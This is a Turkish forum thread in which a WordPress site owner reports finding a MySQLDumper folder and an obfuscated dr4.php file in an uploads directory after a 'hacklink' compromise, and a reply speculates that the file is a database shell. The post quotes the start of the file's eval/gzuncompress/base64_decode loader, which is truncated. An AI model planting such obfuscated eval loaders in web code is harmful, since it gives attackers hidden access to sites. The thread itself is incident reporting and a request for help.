Merhaba arkadaşlar bugün hostumun yedeğini alırken upload klasorunda 05 nolu resim klasorunun içinde
MySQLDumper1.24.4 klasoru ve
dr4.php adında bir dosya atılmış.
dosyanın içeriği ise
<?php /* Th3-0uTl4wS */
eval("?>".gzuncompress(base64_decode("eJzsuumS49iVJvi/zfodvKI0HammlNg3KVNqgARAEMRC7GDZWBr2fd9RXe8+oHtELlKmWjUzNjM/hrRwOnHPPfs59zvbu şekilde başlıyor.
Dosyaların tarihine baktığımda 29.09.2012 olarak gösteriyor.
Ben 16.10.2012 tarihinde sitemde hacklink olduğunu farketmiştim daha sonra wpyi güncellemiştim link kalmıştı.
Siteme eklenen link ise
Th3-0uTl4wS araştırdğımda bir çok hack ile ilgili sonuçlar çıkıyor. Bu linki bu dosyaları atan kişi yapmış olabilirmi ayrıca MySQLDumper1 ile sadece dosyaları ve dbyimi çekmişlerdir.
wp-content/uploads/2012/05 izinleri 755 olarak ayarlı.
Son olarak dr4.php dosyasını çözebilecek arkadaşlar varmı acaba belki içinden birşeyler çıkar.
Hocam konunun üzerinden biraz geçmiş ama yinede yazma gereği duydum her nekadar server güvenliği iyi olsada yazma izinlerini açık bırakmanız yüzünden bu tip durumlara maruz kalmanız çok olağan. Muhtemelen mysqldumperi ya sql nizi almak için yada kendi linklerini veritabanınıza entegre etmek için kullanmışlar.
dr4.php dosyası büyük ihtimalle sql bağlantısı sağlamak adına kullanılan bir shell araçtır. Çok kapsamlı birşey olduğunu düşünmüyorum çünki cyrptolanan kod çok kısa.
Bu konuda hatayı kendinizde aramayın hatanın büyük kısmı server sahiplerinde çünki parayı her verene host satmanın peşindeler ama alanın ne amaçla aldığını kimse merak etmiyor. Alan ya serverdeki diğer siteleri kendisine hedef olarak seçmişse? Bunu hiç düşünen yok. Bu yüzden diyorum ki herkese host satacaksan server güvenliğin en üst düzeyde olmalı küçücük bir php kodlamayla dizin değiştirmeye izin vermeyeceksin.Server sahibiniz kimse onunla görüşün, serverde bu işlerle uğraşan birileri barınmakta

.
Bu mesajımı diğer kullanıcılara birşeyler öğretmek adına yazıyorum. Sizede geçmiş olsun.